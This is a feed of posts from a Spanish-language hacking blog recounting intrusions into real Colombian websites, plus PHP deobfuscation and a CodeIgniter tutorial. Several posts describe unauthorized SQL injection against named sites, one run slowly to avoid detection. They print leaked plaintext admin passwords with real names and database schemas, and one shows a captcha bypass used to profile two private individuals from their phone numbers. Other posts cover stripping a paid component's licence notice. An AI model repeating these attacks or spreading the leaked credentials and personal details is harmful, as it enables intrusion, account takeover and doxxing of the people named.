in[S]eguridad [I]nformatica

Tigo y su captcha: Conociendo sus clientes

noreply@blogger.com (Alex Jurado) — Sun, 23 Aug 2015 19:46:00 +0000

Ahora el turno es para Tigo, hay un sistema llamado Paga tu factura en línea, el cual consta de un número movil y una captcha, todo normal. Veamos su funcionamiento:

Hagamos una petición a un número cualquiera en este caso voy a poner 1234567890 siguiendo el formato de un número de celular común y corriente, tambien ingresamos la captcha que en este caso es hFHtt, presionamos en consultar y el resultado es un lindo mensaje de que no existe dentro de la base de datos.

Verifiquemos las cabeceras HTTP a ver que fue lo que enviamos :D

GET http://www.tigo.com.co/pagarfacturaweb/37504159/hFHtt/1234567890

Host: www.tigo.com.co
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://www.tigo.com.co/pago_express
Cookie: SESS2a4f14016f3d7e26068c197481cd1d0e=DUZnF8luVYrnLuiESIeUyf_QlRP8TkKzuOaYd3vF61c; _ga=GA1.3.1990073354.1440267876; has_js=1; vkeywords=; _dc_gtm_UA-27828589-4=1
DNT: 1
Connection: keep-alive
If-Modified-Since: *

Nada fuera de lo normal en la URL donde realiza la petición vemos la captcha seguido del número de celular enviados, que pasaría si realizamos la misma petición pero con una variante, el número de celular! Cambiemos el número de celular pero ahora por un real, veo entre mis contactos y encuentro a alguien el número de @sp1b0t! (jajaja mentiras) vamos a ver que pasa!

Voala! Bypass de captcha! la petición fue satisfactoria además de mostrarme los datos de la factura!

Ahora que sabemos que se puede bypassear la captcha me programe un script basico para saber que número de celular esta activo, es decir, si el número es terminado en 100 el script recorre hasta el número terminado en 200 verificando cual tiene una factura! -no se como es el funcionamiento en Tigo, pero quizás esta verificación se pueda realizar con algunos números, no en todos los casos-.

Saque 2 números para realizar una prueba de concepto uno terminado en 230****600 y el otro en 230****687, como sabemos una cuenta de Facebook esta ligada a un número de celular así que si realizamos una busqueda con el número de celular podemos identificar a quien pertenece, por ejemplo con los números escogidos tengo el siguiente resultado:

CASO 230****600

Con una busqueda básica en google podemos ver que información de más podemos sacar, obviamente desde aqui parte un vector de ataque dirigido. El resultado de la busqueda nos da una información de que la persona tiene o vendio un vehiculo Mazda 3 modelo 2006 con un kilometraje de 62.500Km por un valor de $23.500.000

CASO 230****687

En la busqueda en google podemos encontrar un documento PDF con una invitación a presentar oferta dentro del proceso ICFES -CLC-022-2010

Con este personaje tengo la siguiente información: Se que es el representante legal de x empresa, correo corporativo, el telefono, extensión y dirección del lugar de trabajo, nombres y apellidos completos.

Encontre el website de la empresa donde trabaja la persona del CASO 2, tienen una pequeña descripción de las personas que trabaja así que ya tengo información más puntual de la persona.

Representante legal y director de tecnologia posiblemente haciendo un whios al website pueda obtener más información de esta persona

Lo único que sobre sale el número de identificación del registrante no tenia ni p**a idea de que era, así que le pregunte a mi amigo @chechohack y me explico lo siguiente: Eso es un identificador para datacenter, debe ser ip colombiana porque sólo se mueve aca.

Continuando la busqueda encontre un portal -para ser sincero me parecio demasiado cursi jajajja- el cual tenia información de esta persona con su pareja, ahora se incluyo una nueva persona. Este portal es como especie de invitación al matrimonio de estas dos personas.

Para no ser más extenso dejaré hasta aquí, se puede ver que se pueda sacar mucha información partiendo de un número de celular.

Hasta la proxima!

Spia GPS - Ubicación y seguimiento vehicular

noreply@blogger.com (Alex Jurado) — Fri, 22 May 2015 16:03:00 +0000

Nuevamente con ganas de llegar aun más lejos, y reteniendo las ganas de publicar una entrada que tengo pendiente porque se que puedo entrar más a fondo y se trata nada más y nada menos de una universidad de "alguna" ciudad de colombia, ya llegará el día en el que publique finalmente mi post.

Una noche testeando y recordando aquel sistema de control vehicular en el que logre entrar, me puse a mirar una web que se encarga de monitorear y ubicar vehiculos por medio de gps. Ví que no sólo eran vehiculos individuales sino que tambien existe un servicio empresarial, el cual se encarga de monitorear varios vehiculos pertenecientes a flotas de buses.

Esta web me saco muchas noches, y hablando con mi amigo maztor inicialmente la veiamos como si fuera un fake, -más que todo por el diseño, no tenia fachada de que fuera algo real ejjejee, malditas apariencias- decidi buscar más a fondo antes de perder el tiempo.

Inicialmente busque su whois para ver la información del propietario y me dio este resultado:

Se puede ver en el correo de contacto otro dominio, realizando un simple ping a las dos, tiene casi el mismo rango de ip

C:\Users\SoportePC>ping spia.com.co

Haciendo ping a spia.com.co [200.91.236.123] con 32 bytes de datos:
Respuesta desde 200.91.236.123: bytes=32 tiempo=8ms TTL=56
Respuesta desde 200.91.236.123: bytes=32 tiempo=10ms TTL=56
Respuesta desde 200.91.236.123: bytes=32 tiempo=10ms TTL=56
Respuesta desde 200.91.236.123: bytes=32 tiempo=8ms TTL=56

C:\Users\SoportePC>ping taxislibres.com.co

Haciendo ping a taxislibres.com.co [200.91.236.125] con 32 bytes de datos:
Respuesta desde 200.91.236.125: bytes=32 tiempo=8ms TTL=56
Respuesta desde 200.91.236.125: bytes=32 tiempo=7ms TTL=56
Respuesta desde 200.91.236.125: bytes=32 tiempo=7ms TTL=56
Respuesta desde 200.91.236.125: bytes=32 tiempo=8ms TTL=56

La nueva dirección tiene un diseño más bonito que la anterior así que por ahora me tiro por testear la de taxislibres.com.co, tambien se puede ver que tiene otro dominio losunos.com.co le tiro un vistazo rapido y no le veo nada.

Ahora me tiro por http://spia.com.co:8090/spiaweb/index.php, este tiene una inyección sql blind (a ciegas). Esta vulnerabilidad al ser tan lenta y con tantas peticiones, decido hacerla por días para no levantar sospechas.

Está al igual que la antes mensionada son las webs que me gustan, ya que puedo sacar mucho provecho (bueno si fuera ciberdelincuente o si no que lo diga @M1ndCr4ck y @sp1b0t algun día realizaremos pentest desde bogota xD).

Esta es la plataforma ingresando como un vehiculo normal, aqui puedo saber la ubicación actual y/o la ultima ubicación hasta cuando se apago el gps, puedo ver la ubicación, la velocidad, el departamento, la ciudad, la posición en latitud y longitud.

Aqui en esta puedo ver los puntos donde se movio en cualquier día a cualquier hora (sólo 1 día),

Aqui podemos sacar algunos reportes de movimientos entre un intervalo de fechas,

Sacando información primero intento sacar los datos de algunas tablas importantes, inicialmente entraré a la base de datos pero primero investigaré y trataré de ver la tabla donde se guardan los usuarios de bases de datos -en elhacker.net le pregunte a uno de los dioses WHK y me dio un tip-, la base de datos donde se guarda es pg_catalog y la tabla es pg_user y las columnas son usename, passwd. De esta forma no saturaremos de peticiones el servidor, sino que se realizara una query mas directa.

Pasando otro día, cansado de esta inyección blind ingrese al panel con el vehiculo anterior e intente inyectar para ver si puedo sacar los datos más rapido, y encontre otra petición post donde la inyección es normal, ahora todo es más facil y agil.

Esto es todo por ahora, para no hacer más largo este post lo dejaré y seguire a ver hasta donde puedo llegar. Quizás después haga la continuación y con resultados aun mayores. (Este es un reto que me lo tome muy a fondo y le gaste mucho tiempo, no lo dejaré tan facil :p).

Feliz Hack!

Dane - Attack iSQL

noreply@blogger.com (Alex Jurado) — Fri, 30 Jan 2015 17:21:00 +0000

Esta vez la web afectada es dane.gov.co, afectada por una iSQL en Oracle y como tiempo atras con mi amigo UNDER de ehn realizabamos pruebas con unn iSQL en Oracle y no obtuvimos resultados satisfactorios, decidi practicar un poco antes de retomar el reto.

Tambien mirando las bases de datos vi algunos datos que puedo destacar, jamas habia visto datos tan sensibles como los que vi, -lo de sensibles lo digo porque cualquiera pueda obtener los datos y utilizarlos como vector de ataque más directo, por así decirlo-.

Bases de datos,


- BDG_OLRR
- BDG_OPERATIVO_2011
- BODEGA_DATOS_ESPACIALES
- CARTO_PREDIAL_RURAL
- CARTOGRAFIA_PREDIAL
- CARTOGRAFIA_PREDIAL_2
- CARTOGRAFIA_PREDIAL_3
- CARTOGRAFIA_PREDIAL_4
- CTXSYS
- DIG_AARELLANOR
- DIG_ACARDOZOA
- DIG_AIPENAR
- DIG_AJFIERRO
- DIG_AMONTERO
- DIG_ARUIZR
- DIG_BEMIRA
- DIG_CADURANG
- DIG_CAROMEROA
- DIG_CATALOGO
- DIG_CDEVIA
- DIG_CHERNANDEZ
- DIG_CRINCON
- DIG_DASALASC
- DIG_DFGUZMAN
- DIG_EANINON
- DIG_EGUEVARA
- DIG_EMDELGADO
- DIG_ERUBIANOL
- DIG_FCHITIVA
- DIG_GALFEREZR
- DIG_HROJASM
- DIG_IJVILLAMIL
- DIG_JAGOMEZT
- DIG_JAMONROYB
- DIG_JFDUQUET
- DIG_JMALVARADO
- DIG_JRODRIGUEZ
- DIG_JZORA
- DIG_LARBOLEDA
- DIG_LCFERNANDEZ
- DIG_LMONTERO
- DIG_LSEGURAL
- DIG_LYMORAF
- DIG_MAVELASQUEZ
- DIG_MORJUELAR
- DIG_NABOHORQUEZ
- DIG_NTRUJILLO
- DIG_OJTORRESJ
- DIG_OLMELLIZOO
- DIG_OMLOPEZ
- DIG_PLMUNOZ
- DIG_PMFRANCO
- DIG_RSARMIENTO
- DIG_RSEGURAR
- DIG_SKAGUIRREG
- DIG_SMORALESL
- DIG_SRODRIGUEZ
- DIG_SYBOLIVAR
- DIG_YGJAIMESR
- EXFSYS
- HOMOLOGADAS
- INFO_REFERENCIA_CATASTRO
- INVENTARIOS
- MAGNA_OPECENSO_2005
- MDSYS
- OLAPSYS
- OPE_CENSO_2005
- OUTLN
- REGISTROS_CATASTRALES
- SDE
- SYS     --> DB ORACLE
- SYSTEM    --> NADA
- UCENSALES_AJUSTADAS05
- UCENSALES_SINAJUSTAR05
- V_MAGNA_1993
- V_MAGNA_1994
- V_MAGNA_1995
- V_MAGNA_1999
- V_MAGNA_2000
- V_MAGNA_2001
- V_MAGNA_2002
- V_MAGNA_2003
- V_MAGNA_2004
- V_MAGNA_2005
- V_MAGNA_2006
- V_MAGNA_2008
- V_MAGNA_2010
- V_MAGNA_2011
- V_MAGNA_2012
- V_MAGNA_2013
- V_MAGNA_2014
- WMSYS

Datos interesantes,


+-------------+------------------+------------------+-------------------------+
| SRVD_NOMBRE | SRVD_MEMORIA_RAM | SRVD_PROCESADOR  | SRVD_USUARIO_ADMNSTRDOR |
+-------------+------------------+------------------+-------------------------+
| DG_EST07    | 4 GB             | Intel Xeon 5160  | NULL                    |
| DG_EST19    | 4 GB             | Intel Xeon 5160  | NULL                    |
| DG_EST01    | 2 GB             | Intel Xeon       | NULL                    |
| DG_PC05     | 1                | AMD Athlon 64 X2 | NULL                    |
| DGWEB02     | 4 GB             | Intel Xeon       | Administrador           |
| SYSTEMA47   | 64 GB            | Intel Xeon       | Administrator           |
| SYSTEMA63   | 4 GB             | Intel Xeon       | NULL                    |
| DGWEB       | 4 GB             | Intel Xeon       | Administrator           |
+-------------+------------------+------------------+-------------------------+

Interesante el equipo SYSTEMA47 un Intel Xeon de 64 GB Wooow!

Las bases de datos que usan: Actualmente estoy en la Oracle!


+-----------+-------------+--------------+
| BSDT_SMBD | BSDT_NOMBRE | BSDT_VERSION |
+-----------+-------------+--------------+
| ORACLE    | ORACLE      | 11.2 R2      |
| POSTGIS 2 | POSTGIS 2   | 2.1          |
+-----------+-------------+--------------+

Datos reales? Pues es lo que se almacena actualmente en la base de datos :p, Hasta la proxima!

Feliz Hack!

phpGrid 2015 - Desofuscar código

noreply@blogger.com (Alex Jurado) — Fri, 23 Jan 2015 16:10:00 +0000

De nuevo necesito utilizar el componente phpGrid para uno de mis proyectos y tenia un problema al momento de utilizar una columna con hipervinculo (no viene al caso explicar mi problema), y tengo que modificar una parte del código para solucionarlo. Así que me dispongo a desofuscar el código con el método anteriormente explicado pero era totalmente diferente.

Para desofuscar usaremos:


function decode($encode){
   echo htmlentities(base64_decode($encode), ENT_QUOTES);
}

Empece por ver el código y tratar de entender como funcionaba, primeramente se tiene:

Se decodifica el eval que esta fuera de la función VWAtBcwrGHZzVTlObfRi($mGDTjrHBfU), y el resultado es:

Que curioso tiene la misma estructura del inicio, sólo que cambia el nombre de la función y el texto que se envia como parametro tiene un tamaño menor, realizo el mismo procedimiento y obtengo:

Nuevamente pasa lo mismo, sigamos aplicando el procedimiento

Ahora si podemos ver el código usado, las variables siguen cifradas pero con sólo ver el código se puede interpretar su función. Feliz hack!

Owneando sistema de seguimiento y control logístico vehicular

noreply@blogger.com (Alex Jurado) — Fri, 23 Jan 2015 04:29:00 +0000

Y este es mi regreso después de mucho tiempo sin hacer lo que más me gusta, esto empezo en la tarde de hoy, donde entro a mi blog y veo entradas sin actualizar desde el 2013 y quería empezar este 2015 de una manera diferente.

En este caso pude lograr el acceso a un servicio encargado del seguimiento y control logístico vehicular, prestado por destinoseguro.net.

Por el momento no voy a dar especificación de como fue el ingreso, hasta no tener contacto con la persona encargada del soporte, como en algunos casos se ha notado la total indiferencia por parte de estos, creo 24 horas es tiempo suficiente para que puedan responderme a mi auditoría, en caso tal, daré por entendido que no le interesa.

Mostraré unas capturas de pantalla, para que vean la información tan sensible que puede contener esta plataforma.

Aquí se muestra que se puede modificar el perfil de usuario, del cual me ingrese.

Aquí muestra el plan de ruta de un vehiculo, información del vehiculo y los lugares por donde paso, la hora exacta y la velocidad que tenia :o

Ahora los vehiculos que tiene GPS, tiene la posibilidad de ser ubicados en una plataforma diferente, ahora es el servicio sonaravl.com que se encarga de mapear la ubicación dada por el GPS.

Ya le envie un correo a la persona que creo que es la encargada del asunto, espero ponerme en contacto con él lo más rapido posible para solucionar este fallo.

Agradecimientos a: Mario E. S. que estuvo en el momento exacto en el que ingrese y fue al primero que le conte y me hizo una porra. Kmilo Z. por la foto que me hizo reir todo el día (gaviota herida) y que será uno de los escritores del blog.

Espero seguir publicando más seguido, feliz hack!

Grave fallo de seguridad en Facebook que permite hackear cualquier perfil

noreply@blogger.com (Alex Jurado) — Thu, 18 Jul 2013 04:43:00 +0000

De nuevo el fantasma de la seguridad planea sobre Facebook, y esta vez puede tratarse de un fallo muy grave.

Al parecer, un bug en la plataforma (que todavía no ha sido arreglado por los desarrolladores de la compañía, según informa The Hacker News) permitiría a cualquiera hacerse con la cuenta de otro usuario en poco menos de 60 segundos.

La vulnerabilidad funciona de la siguiente forma: cuando una persona trata de abrir un perfil nuevo en la red social con una dirección de email que ya está siendo utilizada en la plataforma (por él o por otra persona), gracias a un exploit programado (y que podría encontrarse en la red), el ciberdelincuente podría lograr que Facebook le permitiese usar de nuevo la cuenta de correo ya en uso, lo que le daría acceso a la cuenta que ya está vinculada a este email.

Es decir, que con un pequeño programa malicioso que ha sido desarrollado, cualquiera podría hackear una cuenta de Facebook y hacerse con su control.

La voz de alarma la ha dado el experto en seguridad Dan Melamed y el equipo de seguridad de Facebook ha confirmado que está trabajando para resolver la incidencia lo antes posible, según The Hacker News.

En el siguiente vídeo se explica cómo se lleva a cabo el hackeo de una cuenta:

Visto en news-technology-learning.blogspot.com

ccoa.org.co, camacolvalle.org.co, coogranada.com.co FILE SOURCE DISCLOSURE

noreply@blogger.com (Alex Jurado) — Thu, 11 Jul 2013 06:24:00 +0000

ccoa.org.co
camacolvalle.org.co
coogranada.com.co

saferbo.com - De nuevo!

noreply@blogger.com (Alex Jurado) — Mon, 24 Jun 2013 22:36:00 +0000

y continue rastreando webs que ya han "modificado", y viendo si corrigieron los errores que antes habian, pero al parecer sólo les importa el diseño y dejan a un lado la seguridad.

saferbo.com, le habia hecho una auditoria donde habia conseguido entrar como administrador y ver datos confidenciales.

Cuando entro a la página directamente, miro el código fuente y veo tiene Joomla 1.5, nunca me la he llevado bien inyectando en este gestor, así que sigo buscando... Encontre una página en la raiz, llamada historicos.php, intente inyectarle y voala, nuestro querido y adorado mensaje de SQLMap,


#
# GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
#

Esto no se porque ocurre si se supone que al cambiar el código independiente, -comunmente llamado por un profesor de mi universidad código chorizo ajjaja-, al gestor de contenido "x" se deben de configurar todas las paginas a este gestor, más por agilidad, organización y seguridad, -se supone :p-, en algunas ocaciones dejan paginas sueltas que se siguen usando, y ahí es donde entramos a aprovecharnos :p


#
# MySQL >= 5.0.0
# BASES DE DATOS [2]:
# [*] information_schema
# [*] informer41
# CURRENT USER: 'ww11saf@%'
# IS DBA: FALSE
#

Liberar BlackBerry - MEP2

noreply@blogger.com (Alex Jurado) — Thu, 06 Jun 2013 20:03:00 +0000

Por motivos de la vida y quizás laborales, necesitaba con urgencia la liberación de operador de una BlackBerry, y como nunca he tenido contacto con este tipo de problema, -ya que el mio es liberado desde que lo compré-, me puse a investigar en Google y en muchos de los casos se tenia que depender de un usuario tercero, el cual proporciona el código de activación MEP que pide el teléfono. Pues vamos al caso!

Necesitamos sacar el IMEI (código pre-grabado en los teléfonos móviles GSM) de la BB. Esté código se puede sacar por varios métodos, pero como necesitamos varia información ingresamos directamente, presionamos la tecla alt + aA↑ + H

Tendrémos una pantalla como la siguiente,

Imagen sacada de movical.net

Sacamos los datos de PIN [227e1bd6], Versión de la aplicación [5.0.0.681 (1168)] y Tiempo de actividad [1210]. Estos datos se ingresan en una calculara para sacar un código único para ingresar al menú de ingeniería, -tener cuidado de no demorarse en digitar el número que nos ha tirado la calculadora ya que, esté código depende del tiempo de actividad y cambia cada cierto tiempo-.

Esté número se digita en la misma pantalla en la que estamos situados, -de forma imaginaría, porque al presionar las teclas no los verán-, para los números mantén pulsado ALT más el número, para las letras simplemente pulsa el botón de la letra.

Nos saldrá un menú como esté,

Imagen sacada de movical.net

Ingresamos a la opción OS Engineering Screens -> Device Info, y tendrémos la siguiente información, debemos de buscar el ítem MEP-XXXXX-XXX.

Imagen sacada de movical.net

Hasta aquí llegan la mayoria de los tutoriales, y dicen que hay que pagar o pedir el número de activación por parte de un usuario tercero, pero tengo la aplicación para que lo hagan y no tengan que esperar, BBCalculator.exe (3.77 MB).

Sólo queda ingresar el IMEI y seleccionar en la lista el MEP y el código que genere es el que liberá la BlackBerry!

Jorge Barón Televisión - De nuevo!

noreply@blogger.com (Alex Jurado) — Wed, 05 Jun 2013 06:23:00 +0000

Aprovechando que salí de la universidad, volvi a retomar un poco las auditorias y empece a buscar en algunas que había hecho hace mucho tiempo, con el fin de ver si aún seguian vulnerables, -creo que esto desperto despúes de ver una publicación en DragonJAR donde hablaron de los backd00rs-, vi muchas diferencias en el diseño de la página de jorgebarontelevision.com.co y pensé en que hayan modificado el código.

Inicie con la busqueda de vectores de ataque y como primero intenté la iSQL y voala, aún seguia vigente, , usando mi nuevo mejor amigo SQLMap, entre a la estructura de la base de datos y los campos eran diferentes.


"idusuario" , "int(9)"
"strnombre" , "varchar(100)"
"strcargo"  , "varchar(100)"
"strlogin"  , "varchar(50)"
"strclave"  , "varchar(20)"
"idactivo"  , "int(1)"
"idperfil"  , "int(1)"
"dsfoto"    , "varchar(255)"
"dsprof"    , "varchar(255)"
"dscom"     , "mediumtext"
"dscorreo"  , "varchar(255)"

Hasta me dio mucha risa los usuarios que se encuentran registrados, ajjajajaja malditos...


+--------------------------+----------------------+-----------------+---------------------------+
| strcargo                 | strclave             | strlogin        | strnombre                 |
+--------------------------+----------------------+-----------------+---------------------------+
| Webmaster jorgebaron.com | Nfrmr2011            | jorgebarontv    | SuperAdmon                |
| auxiliar                 | auxsena              | graficador      | jason                     |
| Periodista               | web191               | periodista      | Carlos Acu\xf1a           |
| auxiliar                 | 1030                 | 578906          | jeisson mendieta          |
| null                     | *.*.*.*.*.*.*.*.*.*. | oscaralvarezga  | null                      |
| Usuario de Sistema       | elite01              | Mcampuzano      | Mauricio Campuzano        |
| auxiliar                 | auxiliar             | auxiliar01      | Auxiliar                  |
| Graficador               | wipes                | wipes           | Andres Ospina             |
| Jefe de Sistemas         | Luc1a2006            | amleon          | Angel Mauricio Leon Mora  |
| WebMaster                | JAVEwagr.2012        | wagrprogramador | William Arturo Gil Rativa |
| WEBMASTER                | 1234567890           | soyloca         | WILLIAM GAY               |
| WEBMASTER                | 1022992085           | FELIPEMILLOS    | FELIPE TELLEZ             |
+--------------------------+----------------------+-----------------+---------------------------+

Para acabar de ajustar es un "WEBMASTER", creo que hace honor a su usuario y contraseña,


+--------------------------+----------------------+-----------------+---------------------------+
| strcargo                 | strclave             | strlogin        | strnombre                 |
+--------------------------+----------------------+-----------------+---------------------------+
| WEBMASTER                | 1234567890           | soyloca         | WILLIAM GAY               |
+--------------------------+----------------------+-----------------+---------------------------+

A veces no es sólo mejorar la vista de algo, tambien hay que probarlas, y en muchos de los casos "asegurarlas".

Mi primera experiencia con SQLMap

noreply@blogger.com (Alex Jurado) — Sun, 07 Apr 2013 22:24:00 +0000

Hoy que regreso de nuevo al campo de la seguridad informatica, decidi empezar con -para ser sincero debí haberlo tomado hace mucho tiempo, y me arrepiento al 100%- sqlmap, para los que no saben que es -dudo que tan siquiera no lo hayan escuchado nombrar-

sqlmap es una herramienta desarrollada en python para realizar inyección de código sql automáticamente. Su objetivo es detectar y aprovechar las vulnerabilidades de inyección SQL en aplicaciones web. Una vez que se detecta una o más inyecciones SQL en el host de destino, el usuario puede elegir entre una variedad de opciones entre ellas, enumerar los usuarios, los hashes de contraseñas, los privilegios, las bases de datos , O todo el volcado de tablas / columnas específicas del DBMS , ejecutar su propio SQL SELECT, leer archivos específicos en el sistema de archivos y mucho más. dragonjar.org

Estuve escaneando la web, y como resultado arrojo:

#
python sqlmap.py -u http://[TARGET]/index.php?iddetalle=isep --dbs --dbms=MySQL

available databases [2]:
[*] information_schema
[*] xxxxx_xxxxxxxxxxxx
#

Después procedo a acceder a las tablas de la base de datos,

#
python sqlmap.py -u http://[TARGET]/index.php?iddetalle=isep -D xxxxx_xxxxxxxxxxxx --tables

Database: xxxxx_xxxxxxxxxxxx
[41 tables]
+-----------------------------+
| admin_administradores       |
| admin_grupos                |
| admin_grupos_admins         |
| admin_usuarios              |
| admin_usuarios_grupos       |
| ....................        |
+-----------------------------+
#

Ahora consulta las columnas de la tabla admin_usuarios

#
python sqlmap.py -u http://[TARGET]/index.php?iddetalle=isep -D xxxxx_xxxxxxxxxxxx -T admin_usuarios --columns

Database: xxxxx_xxxxxxxxxxxx
Table: admin_usuarios
[6 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| cargo     | varchar(20)      |
| email     | varchar(100)     |
| idusuario | int(10) unsigned |
| login     | varchar(10)      |
| nombre    | varchar(50)      |
| passw     | varchar(32)      |
+-----------+------------------+
#

Este paso, fue sólo por practicar jajaja, porque pude haberlo printeado de una vez,

#
python sqlmap.py -u http://[TARGET]/index.php?iddetalle=isep -D xxxxx_xxxxxxxxxxxx -T admin_usuarios --dump

Database: xxxxx_xxxxxxxxxxxx
Table: admin_usuarios
[1 entry]
+-----------+-------+-----------+-------+-----------------+--------+
| idusuario | cargo | passw     | login | email           | nombre |
+-----------+-------+-----------+-------+-----------------+--------+
| 14        | Admin | manager07 | admin | admin@admin.com | Admin  |
+-----------+-------+-----------+-------+-----------------+--------+
#

Ooooppsss! contraseña sin cifrado, soy un megakaker :p

Bueno, hasta ahora todo va bien, encontre el panel de logueo e ingrese, busque subir una webshell pero por desgracia tiene filtros el upload, intente bypassearlo pero no fue posible -o no fui capaz, por lo menos lo intente-.

Encontre otro upload donde se podian subir archivos, pero al intentar ingresar al archivo salia INTERNAL SERVER ERROR, pero cuando lo subia me mostraba el link para verlo pero cuando ingresaba lo forzaba a descargarse entonces pense, quizás pueda descargar archivos del servidor, y sí, puedo ver los archivos pero nada que pueda generar el ingreso al servidor, la base de datos esta local, hasta aquí puedo llegar voy a seguir mirarndo que puedo hacer,

Como finalidad la herramienta SQLMap es excelente!

phpGrid Desofuscado al 100%

noreply@blogger.com (Alex Jurado) — Tue, 05 Feb 2013 22:47:00 +0000

Hace poco tiempo escribí una entrada hacer de como INTEGRAR PHPGRID EN CODEIGNITER, pues para ser sincero, esta es el único componente del tipo grilla que me gusta y es fácil de usar e instalar.

Este componente me llevo muchas horas -que por cierto, completamente INNECESARIAS ya les contaré porque-, a la hora de verle el código fuente real.

Primero fue el código ofuscado que tenia, -ya habia escrito la forma de bypassearlo en la entrada [ANOTACIÓN MENTAL] DESOFUSCACIÓN DE CÓDIGO PHP-.

Cuando ya todo lo tenia claro, llego la hora desofuscar todo el código y formatearlo -(tabularlo)-, pero plop, no faltaba más que un control de pago fuera tan fácil de desofuscar para ver código fuente original -pensaba yo-, cuando llegaba al control ubicado en la ruta,

.\htdocs\phpGrid\server\classes\cls_datagrid.php

este me daba problemas, al momento de visualización el componente en tiempo de ejecución, -por así decirlo-, pense en dejarlo así y lo deje por muchoooooo tiempoooooo, hasta el día de hoy, que por motivos laborales tenia que tener un control más limpio en el componente, -quitarle definivamente el mensaje de, versión libre compre la versión full, pffff comprar mis polainas-, entonces pense en veríficar el código fuente del componente original -ofuscado-, con el que intentaba desofuscar y voala, TODO ESTABA IGUAL :/, ni generaba errores de nunguna clase, pero note que la tabulación era diferente, ya que el código tenia unos comentario y en el original los tabulaba correctamente, pero en la ofuscada interrumpian la ejecución del código siguiente, después de los comentarios... Así que decí quitarlos y ahora si, voala.... phpGrid Desofuscado!

Para los que quieran, aquí les dejo el componente sin ninguna modificación, -hablando sólo de funcionalidad-.

phpGrid versión del día 05/02/2013 desofuscado

Análisis de malware + Incremento de visitas en videos de youtube

noreply@blogger.com (Alex Jurado) — Wed, 30 Jan 2013 03:42:00 +0000

Después de algun tiempo sin ver malware en facebook, hace algunos días empece a notar una cantidad de visitas a una pagina "rara", y ver que algunos contactos del facebook se etiquetaban entre sí alocadamente jajajaj.

Pues me he decido a analizarlo a ver que se puede sacar, esta vez no será profundo sólo veremos que hace asi por encima, -también tengo vida social, y trabajos pendientes :p-.

La pagina es la siguiente, -de ahora en adelante, tocará mostrar todo por medio de imagenes, ya que en algunos antivirus reconocen mi blog como un sitio infectado ya que aveces incluia parte del código malicioso-

Imagen 1: URL de la página.

Parecierá que identificar el tipo de navegador para intriducir así el pluggin. Bajo y analizo el pluggin -para lo único que es bueno el internet explorer es para bajarme los pluggin ajjaja-, y lo que me encuentro es raro, realiza como redirecciones a algunos videos de youtube, y para ser sincero, tiene gran numero de visitas.

Imagen 2: Redirecciones a unos videos de youtube.

Aun no entiendo que hace con la página de ask.fm, jajajaj, por ahora sólo veo, que visita un perfil y un comentario, y un follow a unos usuarios,

Imagen 3: Interacción con ask.fm

Como por ultimo realiza algunas cosas en unos perfiles de facebook, -que los quemen a todos jajaja Pues ya, no fue mucho el análisis que hice, sólo mire, nada del otro mundo... Buena manera de "promocionar", los videos de youtube...

Todavía queda por analizar unas cuantas cosas, pero esperaré un momento, recordemos como eliminarlo.

Para Google Chrome Para Firefox

Integrar phpGrid en CodeIgniter

noreply@blogger.com (Alex Jurado) — Thu, 29 Nov 2012 06:21:00 +0000

En esta oportunidad les traigo un problema que en mi situación me tomo varios días para su implementación, además de presentarme con esto como moderador de la sección de Programación WEB en el foro que esta dirigiendo WHK (WHK Security).

Se trata de la integración de la librería phpGrid con el framework CodeIgniter, de la forma más presentable posible, -hablando estéticamente-.

Aquí no explicaré la instalación de los componentes, daré por entendido de que ya tiene todo.

Como es un proyecto básico, -de prueba-, le daremos permisos a la carpeta phpGrid, -ya que es la carpeta raiz-.

sudo chmod 0777 -R /opt/lampp/htdocs/phpGrid/

En el archivo ../phpGrid/assets/lib/phpGrid_Lite/conf.php, editar las variables por sus datos reales,

define('DB_HOSTNAME','localhost'); // SERVIDOR
define('DB_USERNAME', 'root');     // USUARIO
define('DB_PASSWORD', '');         // CONTRASENA
define('DB_NAME', 'mysql');        // BASE DE DATOS
define('DB_TYPE', 'mysql');
define('DB_CHARSET','utf8');

# SNIP

define('SERVER_ROOT', '/phpGrid/assets/lib/phpGrid_Lite'); // PATH DE LA LIBRERÍA

Antes que nada, vamos a configurar el framework con algunas características básicas, dentro del archivo ./phpGrid/application/config/autoload.php, que permite la utilización de algunas funciones importantes, -por ahora y quizás por el resto de la aplicación xD-,

# SNIP
$autoload['helper'] = array('url');
# SNIP

y también en el archivo ./phpGrid/application/config/config.php, pondremos la path completa de la aplicación visualizada desde el servidor local, -ubicación desde el navegador-.

# SNIP
$config['base_url'] = 'http://127.0.0.1/phpGrid/';
# SNIP

Ahora vamos a crear la visualización principal con la ayuda de una carpeta llamada template dentro de la carpeta view, así podremos tener una aplicación con unos valores estaticos, -que son los valores que se repiten en todas las páginas-, y tambien dinamicos -vistas independientes del controlador-.

template/header.php, en este archivo se pondrán la cabecera de la pagina, así que todos los estilos y scripts deben de estar aquí.

<!DOCTYPE html>
<html>
   <head>
      <meta charset='utf-8' />
      <title><?php echo $title; ?></title>
      <link rel="stylesheet" href="<?= base_url("assets/css/style.css"); ?>" />
      <script src="<?= base_url("assets/js/jquery-1.7.1.min.js"); ?>"></script>
      <!-- START  scripts phpGrid -->
      <link rel="stylesheet" href="<?= base_url("assets/lib/phpGrid_Lite/css/start/jquery-ui-1.8.21.custom.css"); ?>" />
      <link rel="stylesheet" href="<?= base_url("assets/lib/phpGrid_Lite/css/ui.jqgrid.css"); ?>" />
      <script src="<?= base_url("assets/lib/phpGrid_Lite/js/jquery-ui-1.8.21.custom.min.js"); ?>"></script>
      <script src="<?= base_url("assets/lib/phpGrid_Lite/js/i18n/grid.locale-es.js"); ?>"></script>
      <script src="<?= base_url("assets/lib/phpGrid_Lite/js/jquery.jqGrid.min.js"); ?>"></script>
      <script src="<?= base_url("assets/lib/phpGrid_Lite/js/grid.import.fix.js"); ?>"></script>
      <!-- END    scripts phpGrid -->
   </head>
   <body>
      
      <header id="header">
         <div class="wrapper">
            <h1><?php echo $title; ?></h1>
         </div>
      </header>

template/footer.php, en este archivo se pondrá la finalización HTML de la pagina.

      <footer id="footer">
         <div class="wrapper">
            Tiempo de carga de la pagina <b>{elapsed_time}</b>.
         </div>
      </footer>
   </body>
</html>

